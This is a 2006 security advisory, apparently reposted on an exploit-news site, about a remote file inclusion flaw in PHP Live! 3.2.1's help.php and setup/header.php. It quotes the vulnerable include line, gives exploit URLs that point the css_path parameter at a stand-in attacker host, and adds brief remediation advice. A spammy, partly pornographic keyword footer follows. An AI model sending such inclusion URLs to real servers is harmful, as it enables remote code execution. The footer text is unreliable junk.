about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability




2006-07-23 PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
Rated as : High Risk

    Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" :
$css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to
make
sure the code and your PHPLIVE you have to sanitize the variable
$css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------
securitydot.net - 2006-07-23

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 08:18:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.hbskxx for www.x college gi Vidio porn Sexwap wo118.com www.cqwbbj www.lierm. www.newdol news for c mambo Remo 2.../../et www.wo118. xxx.videos search/exp Vidio porn suse 9.2 www.hbdngs 4.5 bsd ventrillo Girls sexs big kuck www.2008sf Www wptric www.happyb Vidio porn www.2008sf Thrishabat www.gzjian Sexaction. Www.tamilB nice www.jisou. WWW.Sexmov www.gloryl Exploits S apache tom mambo+Remo 2.6.2-5 mambo+Remo mambo Remo phpmyadmin php+advanc php+advanc indiansexy www.gemisl RSS\\r\\n OpenSSH 3 Exploits S .html/....